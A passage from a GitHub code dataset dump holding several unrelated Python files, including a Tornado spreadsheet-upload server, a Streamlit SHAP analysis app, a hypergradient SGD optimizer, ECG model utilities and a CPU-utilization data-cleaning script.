y2_fair.iloc[[0]].values[0].tolist()\ndiff = []\n\n# diff.append(CVR)\n# diff.append(CVD)\ndiff.append(AVD_SPD)\ndiff.append(AVD_EOD)\ndiff.append(AVD_AOD)\ndiff.append(AV_ERD)\n\nfor i in range(len(row_y2)):\n if(i < 2):\n change = row_y2[i] - row_y1[i]\n else:\n break;\n diff.append(change)\n\nstage = 'Custom(feature)'\nmodel_name = 'titanic5'\n# diff = diff_df.iloc[0].values.tolist()\ndiff.insert(0, stage)\ndiff.insert(0, model_name)\n\ncols = ['Pipeline', 'Stage', 'SF_SPD', 'SF_EOD', 'SF_AOD', 'SD_ERD', 'Acc', 'F1']\n# metrics = pd.DataFrame(data=obj_fairness, index=['y1'], columns=cols)\ndiff_df = pd.DataFrame(data=[diff], columns = cols, index = ['Diff']).round(3)\n\nwith open(diff_file, 'a') as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(diff)\n\n","repo_name":"sumonbis/FairPreprocessing","sub_path":"src/fair-preprocessing/titanic/TT5.py","file_name":"TT5.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"71660874782","text":"from os import path\nimport random\nimport os\nfrom . import myhash\npth = path.join(path.expanduser(\"~\"), \"meowMemo\")\n\n\ndef ensure_dir(pth):\n if(not path.exists(path.dirname(pth))):\n os.makedirs(path.dirname(pth))\n\n\ndef get_temp_file(ext='.in'):\n filename = myhash.base32(random.randrange(1 << 40), length=8)\n return path.join(pth, 'temp', filename+ext)\n\n\nif(__name__ == '__main__'): # unit test\n print(get_temp_file())\n\n print(get_temp_file())\n","repo_name":"TkskKurumi/meow-memo","sub_path":"memo/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23768734171","text":"from PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nimport sys\nimport cv2\nfrom PyQt5.uic import loadUiType\nimport urllib.request \nimport os\nfrom os import path\n\n\nui,_ = loadUiType(path.join(path.dirname(__file__),'main.ui'))\n\n\nclass MainApp(QMainWindow , ui):\n def __init__(self , parent=None):\n super(MainApp , self).__init__(parent)\n QMainWindow.__init__(self)\n self.setupUi(self)\n self.Handel_buttons()\n #self.cam=cv2.VideoCapture(0)\n self.img_counter=0\n \n \n def Handel_buttons(self):\n self.pushButton.clicked.connect(self.open_camera)\n self.pushButton_2.clicked.connect(self.close_camera)\n self.pushButton_3.clicked.connect(self.take_pic)\n def open_camera(self):\n self.cam=cv2.VideoCapture(0)\n cv2.namedWindow('Kamera')\n while True:\n ret, self.frame=self.cam.read()\n cv2.imshow('Kamera',self.frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n self.cam.release()\n cv2.destroyAllWindows()\n def close_camera(self):\n while True:\n cv2.destroyWindow(self.frame)\n \n def take_pic(self):\n img_name = \"opencv_frame_{}.png\".format(self.img_counter)\n cv2.imwrite(img_name,self.frame)\n self.img_counter+=1\n \n img_counter=img_counter\n print(img_counter)\ndef main():\n app = QApplication(sys.argv)\n window = MainApp()\n window.show()\n app.exec_()\n\nif __name__ == '__main__':\n main()","repo_name":"AhmadOunabi/Camera","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32871376894","text":"#!/usr/bin/env python\n\nimport datetime, os, random, string\n\nimport tornado.ioloop\nimport tornado.web\nimport convert\n\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nEXT = set(['.xls', '.xlsx']) # accepted extensions\n\nimport sqlite3\ndbconn = sqlite3.connect('products.db')\nif not os.path.exists('uploads'):\n os.makedirs('uploads')\n dbconn = convert.setup_tables()\n\ndef reset():\n # clean database\n dbconn = convert.setup_tables() # resets database\n # clean up uploads folder\n for f in os.listdir('uploads'):\n path = os.path.join('uploads', f)\n if os.path.isfile(path):\n os.unlink(path)\n\ndef buildfilelist(directory):\n uploads = []\n for f in os.listdir(directory):\n (token, ext) = os.path.splitext(f)\n datestr = str(datetime.datetime.fromtimestamp(os.stat(os.path.join(directory, f)).st_atime))\n uploads.append((token,datestr))\n return uploads\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"upload_form\")\n\nclass UploadHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"upload_form\", message=None, uploads=buildfilelist('uploads'))\n\n def post(self):\n ofn = '' #original file name\n ufn = '' #uploaded file name\n message = ''\n uploads = buildfilelist('uploads')\n\n if self.request.files.get('uploaded_file'):\n uploaded_file = self.request.files['uploaded_file'][0] #input file\n ofn = uploaded_file['filename'] \n (root, ext) = os.path.splitext(ofn)\n if ext and ext.lower() not in EXT:\n self.render(\"upload_form\", message='unknown file extension', uploads=uploads)\n return\n import_id = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(10))\n ufn= import_id + ext \n with open(os.path.join('uploads', ufn), 'w') as output_file:\n output_file.write(uploaded_file.body)\n message = message + 'file uploaded successfully'\n with open(os.path.join ('uploads', ufn), 'rb') as fh:\n convert.import_xls(fh, import_id, dbconn)\n # append the file we just uploaded\n datestr = str(datetime.datetime.fromtimestamp(os.stat(os.path.join('uploads', ufn)).st_atime))\n uploads.append((import_id, datestr))\n headers=convert.get_headers(import_id, dbconn)\n rows=convert.get_import(import_id,dbconn)\n\n self.render(\"upload_form\", message=message, uploads=uploads)\n\nclass ViewHandler(tornado.web.RequestHandler):\n def get(self, token):\n headers=list(convert.get_headers(token, dbconn))\n rows=list(convert.get_import(token,dbconn))\n self.render('view_page', headers=headers, rows=rows)\n\nclass ResetHandler(tornado.web.RequestHandler):\n def get(self):\n reset()\n self.render('reset_page')\n\napplication = tornado.web.Application(\n [\n (r\"/\", UploadHandler),\n (r\"/view/([\\w]+)\", ViewHandler),\n (r\"/reset/\", ResetHandler),\n ],\n debug = True,\n template_path='templates',\n )\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n application.listen(port)\n tornado.ioloop.IOLoop.instance().start()\n","repo_name":"smallsweet/productify-test","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13651033593","text":"import streamlit as st\r\nimport pandas as pd\r\nimport pycaret.regression as pr\r\n\r\n\r\n@st.cache(persist=False,\r\n allow_output_mutation=True,\r\n suppress_st_warning=True,\r\n show_spinner=True)\r\ndef load_csv():\r\n df_input = pd.DataFrame()\r\n df_input = pd.read_csv(input, sep=None, engine='python', encoding='utf-8',\r\n parse_dates=True,\r\n infer_datetime_format=True)\r\n return df_input\r\n\r\n\r\nif __name__ == \"__main__\":\r\n st.set_page_config(page_title=\"Python Key Influencers\", page_icon=\"🔍\", layout=\"wide\")\r\n\r\n st.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\n st.title(\r\n \"Python Key Influencers\"\r\n )\r\n st.subheader(\r\n \"\"\"\r\n A simple XAI (eXplainable Artificial Intelligence) machine learning app inspired by Key Influencers module from Power BI. \r\n \"\"\"\r\n )\r\n with st.expander(\"What's going on?\"):\r\n st.write(\r\n \"\"\"\r\n We are using [*SHAP (SHapley Additive exPlanation)*](https://github.com/slundberg/shap) values, a new fancy game theoretical approach to analise machine learning algorithms such as Gradient Boosted Tree Models like [*LightGBM*](https://lightgbm.readthedocs.io/en/latest/).\r\n \r\n It connects optimal credit allocation with local explanations using the classic Shapley values from game theory and their related extensions.\r\n \r\n \"\"\"\r\n )\r\n\r\n st.markdown('-----')\r\n\r\n st.sidebar.title(\"Menu\")\r\n\r\n st.sidebar.subheader(\"1. Upload your .csv\")\r\n\r\n input = st.sidebar.file_uploader(label=\"Note: only .csv\")\r\n\r\n if not input:\r\n st.sidebar.subheader(\"Or you can directly load a Complete Example\")\r\n with st.sidebar.expander(\"Examples\"):\r\n\r\n check1=st.checkbox(\"Ex 1. Price column in Automobile\")\r\n check2=st.checkbox(\"Ex 2. Price in Diamond\")\r\n check3=st.checkbox(\"Ex 3. Strength in Concrete\")\r\n check4=st.checkbox(\"Ex 4. CNT in Bike\")\r\n if check1+check2+check3+check4>1:\r\n st.sidebar.warning(\"Check only one example at time\")\r\n\r\n\r\n if check1:\r\n from pycaret.datasets import get_data\r\n df = get_data('automobile')\r\n with st.expander('Explore data'):\r\n st.dataframe(df.head(10))\r\n with st.spinner(\"Analyzing...\"):\r\n reg = pr.setup(\r\n df,\r\n target='price',\r\n use_gpu=True,\r\n silent=True,\r\n feature_selection=True\r\n )\r\n\r\n lgbm = pr.create_model('lightgbm')\r\n fig = pr.interpret_model(lgbm)\r\n st.text('SHAP analysis of your Data')\r\n st.pyplot(fig)\r\n st.sidebar.success(\"Succesful Analysis\")\r\n if check2:\r\n from pycaret.datasets import get_data\r\n\r\n df = get_data('diamond')\r\n with st.expander('Explore data'):\r\n st.dataframe(df.head(10))\r\n with st.spinner(\"Analyzing...\"):\r\n reg = pr.setup(\r\n df,\r\n target='Price',\r\n use_gpu=True,\r\n silent=True,\r\n feature_selection=True\r\n )\r\n\r\n lgbm = pr.create_model('lightgbm')\r\n fig = pr.interpret_model(lgbm)\r\n st.text('SHAP analysis of your Data')\r\n st.pyplot(fig)\r\n st.sidebar.success(\"Succesful Analysis\")\r\n if check3:\r\n from pycaret.datasets import get_data\r\n\r\n df = get_data('concrete')\r\n with st.expander('Explore data'):\r\n st.dataframe(df.head(10))\r\n with st.spinner(\"Analyzing...\"):\r\n reg = pr.setup(\r\n df,\r\n target='strength',\r\n use_gpu=True,\r\n silent=True,\r\n feature_selection=True\r\n )\r\n\r\n lgbm = pr.create_model('lightgbm')\r\n fig = pr.interpret_model(lgbm)\r\n st.text('SHAP analysis of your Data')\r\n st.pyplot(fig)\r\n st.sidebar.success(\"Succesful Analysis\")\r\n if check4:\r\n from pycaret.datasets import get_data\r\n\r\n df = get_data('bike')\r\n with st.expander('Explore data'):\r\n st.dataframe(df.head(10))\r\n with st.spinner(\"Analyzing...\"):\r\n reg = pr.setup(\r\n df,\r\n target='cnt',\r\n use_gpu=True,\r\n silent=True,\r\n feature_selection=True\r\n )\r\n\r\n lgbm = pr.create_model('lightgbm')\r\n fig = pr.interpret_model(lgbm)\r\n st.text('SHAP analysis of your Data')\r\n st.pyplot(fig)\r\n st.sidebar.success(\"Succesful Analysis\")\r\n if input:\r\n df = load_csv()\r\n with st.expander('Explore data'):\r\n st.dataframe(df.head(10))\r\n columns = list(df.columns)\r\n st.sidebar.subheader(\"2. Select objective column\")\r\n y_column_name = st.sidebar.selectbox(\"Note: only numerical\", index=0, options=sorted(columns),\r\n key=\"Columna Objetivo\")\r\n st.sidebar.subheader(\"3. Begin Analysis\")\r\n if st.sidebar.button('Run'):\r\n with st.spinner(\"Analyzing...\"):\r\n reg = pr.setup(\r\n df,\r\n target=y_column_name,\r\n use_gpu=True,\r\n silent=True,\r\n feature_selection=True\r\n )\r\n\r\n lgbm = pr.create_model('lightgbm')\r\n fig = pr.interpret_model(lgbm)\r\n st.text('SHAP analysis of your Data')\r\n st.pyplot(fig)\r\n st.sidebar.success(\"Succesful Analysis\")\r\n\r\n st.sidebar.header('About')\r\n st.sidebar.success(\r\n \"\"\"\r\n Python Key Influencers app is maintained by \r\n **Roger Pou López** while working as Data Scientist at [**Grupo Vall Companys IT department**](https://www.vallcompanys.es/). No property intended. If you like this app please star its\r\n [**GitHub**](https://github.com/rogerpou/Key-Influencers-App)\r\n repo, share it and feel free to open an issue if you find a bug \r\n or if you want some additional features. \r\n \"\"\"\r\n )\r\n","repo_name":"rogerpou/Key-Influencers-App","sub_path":"keyinfluencersapp.py","file_name":"keyinfluencersapp.py","file_ext":"py","file_size_in_byte":6617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30287623676","text":"# code from https://github.com/gbaydin/hypergradient-descent/blob/master/hypergrad/sgd_hd.py\nimport logging\n\nimport torch\nfrom functools import reduce\nfrom torch.optim.optimizer import Optimizer, required\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass HypergradSGD(Optimizer):\n def __init__(self, params, lr=required, momentum=0, dampening=0,\n weight_decay=0, nesterov=False,\n hypergrad_lr=0, hypergrad_momentum=0, min_lr=1e-6):\n if lr is not required and lr < 0.0:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if momentum < 0.0:\n raise ValueError(\"Invalid momentum value: {}\".format(momentum))\n if weight_decay < 0.0:\n raise ValueError(\"Invalid weight_decay value: {}\".format(weight_decay))\n\n defaults = dict(lr=lr, momentum=momentum, dampening=dampening,\n weight_decay=weight_decay, nesterov=nesterov,\n hypergrad_lr=hypergrad_lr, hypergrad_momentum=hypergrad_momentum, min_lr=min_lr)\n if nesterov and (momentum <= 0 or dampening != 0):\n raise ValueError(\"Nesterov momentum requires a momentum and zero dampening\")\n super(HypergradSGD, self).__init__(params, defaults)\n\n for group in self.param_groups:\n group['prev_grads'] = [torch.zeros_like(p, requires_grad=False) for p in group['params']]\n group['lr_per_layers'] = [group['lr'] for p in group['params']]\n\n def __setstate__(self, state):\n super(HypergradSGD, self).__setstate__(state)\n for group in self.param_groups:\n group.setdefault('nesterov', False)\n\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n\n Arguments:\n closure (callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n weight_decay = group['weight_decay']\n momentum = group['momentum']\n dampening = group['dampening']\n nesterov = group['nesterov']\n\n hypergrad_lr = group['hypergrad_lr']\n hypergrad_momentum = group['hypergrad_momentum']\n min_lr = group['min_lr']\n\n lr_per_layers = group['lr_per_layers']\n\n for index, (p, d_p_prev) in enumerate(zip(group['params'], group['prev_grads'])):\n if p.grad is None:\n continue\n\n d_p = p.grad.data\n h = torch.dot(d_p.view(-1), d_p_prev.view(-1))\n # group['prev_grads'][index] = d_p.clone().detach().requires_grad_(False)\n\n if hypergrad_momentum != 0:\n param_state = self.state[p]\n if 'momentum_buffer_h' not in param_state:\n buf_h = param_state['momentum_buffer_h'] = torch.clone(h).detach()\n else:\n buf_h = param_state['momentum_buffer_h']\n buf_h.mul_(hypergrad_momentum).add_(1, h)\n h = buf_h\n\n lr = lr_per_layers[index]\n lr = max(min_lr, lr + (hypergrad_lr * h))\n lr_per_layers[index] = lr\n\n if momentum != 0:\n param_state = self.state[p]\n if 'momentum_buffer' not in param_state:\n buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()\n else:\n buf = param_state['momentum_buffer']\n buf.mul_(momentum).add_(1 - dampening, d_p)\n if nesterov:\n d_p = d_p.add(momentum, buf)\n else:\n d_p = buf\n\n group['prev_grads'][index] = d_p.clone().detach().requires_grad_(False)\n p.data.add_(-lr, d_p)\n\n # Apply decoupled weight decay\n if weight_decay != 0:\n p.data.add_(-lr, weight_decay)\n\n group['lr'] = sum(group['lr_per_layers']) / len(group['lr_per_layers'])\n\n return loss\n","repo_name":"wbaek/torchskeleton","sub_path":"skeleton/optim/hypergrads.py","file_name":"hypergrads.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"7"} +{"seq_id":"32891333914","text":"from typing import List, NamedTuple\n\n\nclass Option(NamedTuple):\n name: str\n values: List[str]\n\n\nclass Kernel(NamedTuple):\n arg_types: List[str]\n return_type: str\n available_options: List[str]\n variadic: str\n\n\nclass FunctionDefinition(object):\n def __init__(\n self,\n name: str,\n uri: str,\n description: str,\n options: List[Option],\n kernels: List[Kernel],\n ):\n self.name = name\n self.uri = uri\n self.description = description\n self.options = options\n self.kernels = kernels\n\n @property\n def details(self):\n return []\n\n @property\n def properties(self):\n return\n\n\nclass FunctionBuilder(object):\n def __init__(self, name: str):\n self.name = name\n self.uri: str = None\n self.description: str = None\n self.options = {}\n self.kernels = []\n\n def set_description(self, description: str):\n self.description = description\n\n def set_uri(self, uri: str):\n self.uri = uri\n\n def try_set_description(self, description: str):\n if self.description is None:\n self.description = description\n\n def note_option(self, name: str, values: List[str]):\n if name in self.options:\n existing_values = self.options[name]\n if existing_values != values:\n raise Exception(\n f\"In the function {self.name} the option {name} had choices {existing_values} but we now encountered choices {values}\"\n )\n else:\n self.options[name] = values\n\n def note_kernel(\n self,\n arg_types: List[str],\n return_type: str,\n available_options: List[str],\n variadic: int,\n ):\n self.kernels.append(Kernel(arg_types, return_type, available_options, variadic))\n\n def finish(self) -> FunctionDefinition:\n if self.description is None:\n self.description = \"Description is missing and would go here\"\n opts = []\n for key, values in self.options.items():\n opts.append(Option(key, values))\n return FunctionDefinition(\n self.name, self.uri, self.description, opts, self.kernels\n )\n\n\nclass LibraryBuilder(object):\n def __init__(self):\n self.functions = {}\n\n def get_function(self, name):\n if name not in self.functions:\n self.functions[name] = FunctionBuilder(name)\n return self.functions[name]\n\n def function_names(self) -> List[str]:\n return sorted(self.functions.keys())\n\n def finish(self) -> List[FunctionDefinition]:\n built_functions = []\n for func_name in sorted(self.functions.keys()):\n built_functions.append(self.functions[func_name].finish())\n return built_functions\n","repo_name":"voltrondata/bft","sub_path":"bft/core/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"38470482776","text":"import torch.nn as nn\r\nimport torch\r\nimport numpy as np\r\n\r\n\r\ndef shape_change_conv(input_shape, kernel_size, padding, stride):\r\n out_shape = [0, 0]\r\n # int((H_in + 2*padding - dilation*(kernel_size-1) - 1)/stride + 1)\r\n numerator_0 = (input_shape[0] + 2 * padding[0] - 1 * (kernel_size[0] - 1) - 1)\r\n numerator_1 = (input_shape[1] + 2 * padding[1] - 1 * (kernel_size[1] - 1) - 1)\r\n out_shape[0] = int(numerator_0 / stride[0] + 1)\r\n out_shape[1] = int(numerator_1 / stride[1] + 1)\r\n return out_shape\r\n\r\n\r\ndef signal_rescale(signal: np.array, up_slice):\r\n return np.array([subarray[:up_slice] for subarray in signal])\r\n\r\n\r\ndef make_standard_layer(in_channels, out_channels, kernel_size,\r\n padding, stride, LReLU_coef,\r\n pool_kernel_size, pool_padding, pool_stride):\r\n return nn.Sequential(\r\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels,\r\n kernel_size=kernel_size,\r\n padding=padding, stride=stride),\r\n nn.BatchNorm2d(out_channels),\r\n nn.LeakyReLU(LReLU_coef),\r\n nn.MaxPool2d(kernel_size=pool_kernel_size,\r\n padding=pool_padding, stride=pool_stride)\r\n )\r\n\r\n\r\nclass DoublePathLayer(nn.Module):\r\n def __init__(self, layer1, layer2, layerunite, unite='concat'):\r\n super(DoublePathLayer, self).__init__()\r\n assert unite in ['sum', 'concat'], 'unite must be \"sum\" or \"concat\"'\r\n self.layer1 = layer1\r\n self.layer2 = layer2\r\n self.layerunite = layerunite\r\n self.unite = unite\r\n\r\n def forward(self, x):\r\n x1 = self.layer1(x)\r\n x2 = self.layer2(x)\r\n if self.unite == 'sum':\r\n x1 = x1 + x2\r\n elif self.unite == 'concat':\r\n x1 = torch.cat([x1, x2], dim=1)\r\n x1 = self.layerunite(x1)\r\n return x1\r\n\r\n\r\ndef make_standard_double_layer(in_ch=1,\r\n out_ch=2,\r\n kernel_size=(1, 50),\r\n padding=(3, 30),\r\n stride=(2, 4),\r\n dropout_coef=0.5):\r\n return DoublePathLayer(\r\n layer1=nn.Sequential(\r\n nn.Conv2d(in_channels=in_ch, out_channels=out_ch,\r\n kernel_size=kernel_size,\r\n padding=padding, stride=stride),\r\n nn.BatchNorm2d(out_ch),\r\n nn.LeakyReLU(0.1),\r\n nn.Dropout2d(dropout_coef),\r\n nn.Conv2d(in_channels=out_ch, out_channels=out_ch,\r\n kernel_size=(1, 9), padding=(0, 4), stride=(1, 1))\r\n ),\r\n layer2=nn.Sequential(\r\n nn.MaxPool2d(kernel_size=kernel_size, padding=padding, stride=stride),\r\n nn.Conv2d(in_channels=in_ch, out_channels=out_ch,\r\n kernel_size=(1, 1), padding=(0, 0), stride=(1, 1))\r\n ),\r\n layerunite=nn.Sequential(\r\n nn.BatchNorm2d(out_ch * 2),\r\n nn.LeakyReLU(0.1),\r\n nn.Dropout2d(dropout_coef)\r\n ),\r\n unite='concat'\r\n )\r\n","repo_name":"aimclub/ECG","sub_path":"ECG/NN_based_approach/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"32905386568","text":"# Libraries for data analysis\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nimport pandas as pd\n\n# Library for data visualization\nimport matplotlib.pyplot as plt\n\n# Library for obtaining user preferences\nimport sys\n\n# Reads utilization data from text file\nfile = open(\"CPU_data-0.txt\", \"r\")\n\nelapsed_time = []\nutilization_data = []\n\n# Stores user preference for viewing data visualization\ngraph_plots = True if len(sys.argv) == 2 else False\n\nif graph_plots:\n fig, ax1 = plt.subplots()\n fig, ax2 = plt.subplots()\n\nline = file.readline()\nwhile len(line) > 0:\n elapsed_time.append(int(line.split()[0]))\n utilization_data.append(float(line.split()[1]))\n line = file.readline()\n \nfile.close()\n\n# Deletes first and last 30 data points to eliminate effects of spikes due to program execution and termination\n\nelapsed_time = elapsed_time[30:]\nelapsed_time = elapsed_time[:-30]\n\nutilization_data = utilization_data[30:]\nutilization_data = utilization_data[:-30]\n\n# Plots raw data points\nif graph_plots:\n ax1.plot(elapsed_time, utilization_data)\n ax1.set_xlabel('Time Elapsed (Seconds)')\n ax1.set_ylim(-5, 105)\n ax1.set_ylabel('Resource Utilization (%)')\n\n# ----------------------------------------------------------------------------------------------------\n\n# Stores time values of major spikes in data\nmajor_spikes_time_values = []\n\n# Function for removing minor spikes (small fluctuations) in data for a specified number of rounds\ndef remove_minor_spikes(rounds):\n global utilization_data\n \n # Smoothes data using moving average with window of 10 data points\n \n window_size = 10\n \n smoothed_data = np.zeros_like(utilization_data)\n \n for round in range(rounds):\n # Threshold for detecting spikes\n spike_threshold = np.std(utilization_data)\n \n for i in range(len(utilization_data)):\n # Skip edges where window is not fully available\n if i < window_size//2 or i >= len(utilization_data) - window_size//2:\n smoothed_data[i] = utilization_data[i]\n # Calculate moving average for neighboring data points within threshold\n else: \n neighbors = utilization_data[i - window_size//2: i + window_size//2 + 1]\n \n if np.max(neighbors) - np.min(neighbors) > spike_threshold:\n # If spike detected, skip smoothing for that data point\n smoothed_data[i] = utilization_data[i]\n \n # Adds time values corresponding to major spikes during last round of data smoothing\n if round == rounds - 1:\n major_spikes_time_values.append(i)\n else:\n # Performs moving average for non-spike data points\n smoothed_data[i] = np.mean(neighbors)\n \n utilization_data = np.copy(smoothed_data)\n \n# ----------------------------------------------------------------------------------------------------\n \n# Removes minor fluctuations after 1st layer of data cleaning\nremove_minor_spikes(100)\n\n# ----------------------------------------------------------------------------------------------------\n\nmajor_spikes_boundaries = [major_spikes_time_values[0]]\n\nfor i in range(len(major_spikes_time_values)):\n if i > 0 and major_spikes_time_values[i] - major_spikes_time_values[i - 1] > 1:\n major_spikes_boundaries.append(major_spikes_time_values[i - 1])\n major_spikes_boundaries.append(major_spikes_time_values[i])\n \nmajor_spikes_boundaries.append(major_spikes_time_values[len(major_spikes_time_values) - 1])\n\nfor i in range(len(major_spikes_boundaries) // 2):\n minimum = np.min(utilization_data[major_spikes_boundaries[2 * i] : major_spikes_boundaries[2 * i + 1] + 1])\n \n for time_value in range(major_spikes_boundaries[2 * i], major_spikes_boundaries[2 * i + 1] + 1):\n utilization_data[time_value] = minimum\n\n# General clustering to identify average utilization percentages\n \nstandard_deviation = np.std(utilization_data)\n\naverage_value_transitions = []\n\nfor i in range(5, len(utilization_data) - 5):\n neighbors = utilization_data[i - 5 : i + 5]\n \n if np.max(neighbors) - np.min(neighbors) > standard_deviation:\n average_value_transitions.append(i)\n \ntransition_clusters = [0, average_value_transitions[0]]\n\nfor i in range(len(average_value_transitions)):\n if i > 0 and average_value_transitions[i] - average_value_transitions[i - 1] > 1:\n transition_clusters.append(average_value_transitions[i - 1])\n transition_clusters.append(average_value_transitions[i])\n\ntransition_clusters.append(average_value_transitions[len(average_value_transitions) - 1])\ntransition_clusters.append(len(utilization_data) - 1)\n\nfor i in range(len(transition_clusters) // 2):\n cluster_with_spikes = utilization_data[transition_clusters[2 * i] : transition_clusters[2 * i + 1] + 1]\n average = np.mean(cluster_with_spikes)\n standard_deviation = np.std(cluster_with_spikes)\n \n cluster_without_spikes = [value for value in cluster_with_spikes if value - average < standard_deviation]\n if len(cluster_without_spikes) > 0:\n average = np.mean(cluster_without_spikes)\n \n for j in range(len(cluster_with_spikes)):\n if cluster_without_spikes.count(cluster_with_spikes[j]) == 0:\n cluster_with_spikes[j] = average\n \n utilization_data[j + transition_clusters[2 * i]] = cluster_with_spikes[j]\n\n# ----------------------------------------------------------------------------------------------------\n\n# Removes minor fluctuations after 2nd layer of data cleaning\nremove_minor_spikes(100)\n\n# ----------------------------------------------------------------------------------------------------\n\nfor i in range(len(transition_clusters) - 1):\n min_data_points_in_cluster = 50\n \n if transition_clusters[i + 1] - transition_clusters[i] >= min_data_points_in_cluster:\n sorted_values = np.sort(utilization_data[transition_clusters[i] : transition_clusters[i + 1] + 1])\n median = np.median(sorted_values)\n quartile_1 = np.median(sorted_values[:len(sorted_values) // 2])\n quartile_3 = np.median(sorted_values[(len(sorted_values) // 2):])\n interquartile_range = quartile_3 - quartile_1\n\n for j in range(transition_clusters[i], transition_clusters[i + 1] + 1):\n if utilization_data[j] > quartile_3 + 1.5 * interquartile_range or utilization_data[j] < quartile_1 - 1.5 * interquartile_range:\n utilization_data[j] = median\n else:\n median = np.median(np.sort(utilization_data[transition_clusters[i] : transition_clusters[i + 1] + 1]))\n \n for j in range(transition_clusters[i], transition_clusters[i + 1] + 1):\n utilization_data[j] = median\n\n# DBSCAN (Density-Based Spatial Clustering of Applications with Noise) clustering to identify insignificant clusters\n\ndbscan = DBSCAN(eps=np.std(utilization_data), min_samples=5)\nlabels = dbscan.fit_predict(np.column_stack((elapsed_time, utilization_data)))\n\ncore_samples_mask = np.zeros_like(dbscan.labels_, dtype=bool)\ncore_samples_mask[dbscan.core_sample_indices_] = True\n \n# Finds time values of jumps in average utilization percentage\ncluster_jumps = []\n\nfor i in range(1, len(labels)):\n if labels[i] != labels[i - 1]:\n cluster_jumps.append(i)\n\n# ----------------------------------------------------------------------------------------------------\n\n# Removes minor fluctuations after 3rd layer of data cleaning\nremove_minor_spikes(10)\n\n# ----------------------------------------------------------------------------------------------------\n\n# Plots cleaned data points\nif graph_plots:\n ax2.plot(elapsed_time, utilization_data)\n ax2.set_xlabel('Time Elapsed (Seconds)')\n ax2.set_ylim(-5, 105)\n ax2.set_ylabel('Resource Utilization (%)')\n\ndf = pd.DataFrame({'List1': elapsed_time, 'List2': utilization_data})\n\ndf.to_excel('sheet_0.xlsx', header=False, index=False)\n\n# Displays graphs of raw and cleaned data\nif graph_plots:\n plt.show()","repo_name":"AnkitRaj2/ISM-AI-Model","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8656499782","text":"# Each letter in alphabet is a different question\n# Each group of passengers are separated by a blank line in the input file\n# We only count an answer if everyone in the group answers yes to the same question.\n\nimport string\nfrom collections import Counter\n\n\ndef create_question_list() -> dict:\n questions = {}\n for letter in string.ascii_lowercase: # Create a dictionary of all possible questions\n questions[letter] = 0\n return questions\n\n\ndef count_questions(line: str, group_questions: dict) -> dict:\n added = []\n for question in range(len(line)):\n if line[question] not in added:\n group_questions[line[question]] += 1\n added.append(line[question])\n return group_questions\n\n\ngroup_questions = create_question_list()\ntotal_answers = create_question_list()\npeople = 0 # Number of people in group\n\nwith open('input.txt') as input_file:\n for line in input_file:\n if line == '\\n': # This is the end of the current group\n for answer, value in group_questions.items():\n if value != people:\n group_questions[answer] = 0\n else:\n group_questions[answer] = 1\n total_answers = Counter(total_answers) + Counter(group_questions)\n print(f\"Current Total: {total_answers}\")\n group_questions = create_question_list() # Reset our question list for the next group\n people = 0\n else:\n line = line.strip()\n people += 1\n group_questions = count_questions(line, group_questions)\n print(group_questions)\n\ntotal = 0\nfor _, amount in total_answers.items():\n total += amount\n\nprint(f\"Total: {total}\")\n","repo_name":"gavinnn101/advent-of-code-2020","sub_path":"day06/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71140495583","text":"# population data\nSTART_YEAR = 1951\n\ndef main():\n # open the USPopulation.txt file\n infile = open(\"USPopulation.txt\", \"r\")\n \n # read the contents of the file\n pop_list = infile.readlines()\n \n # close the file\n infile.close()\n \n # convert the contents to integer and strip \\n\n index = 0\n while index < len(pop_list):\n pop_list[index] = int(pop_list[index].rstrip(\"\\n\"))\n index += 1\n \n annual_change(pop_list)\n \ndef annual_change(pop_list):\n # create an empty list\n ann_change = [0] * (len(pop_list)-1)\n \n index = 0\n \n # calculate the total yearly change\n while index < (len(pop_list)-1):\n ann_change[index] = pop_list[index+1] - pop_list[index]\n index += 1\n \n # calculate the average annual change in population\n total = 0\n for num in ann_change:\n total += num\n average = total / len(ann_change)\n print(\"The average annual change in population during the time period is\", \\\n 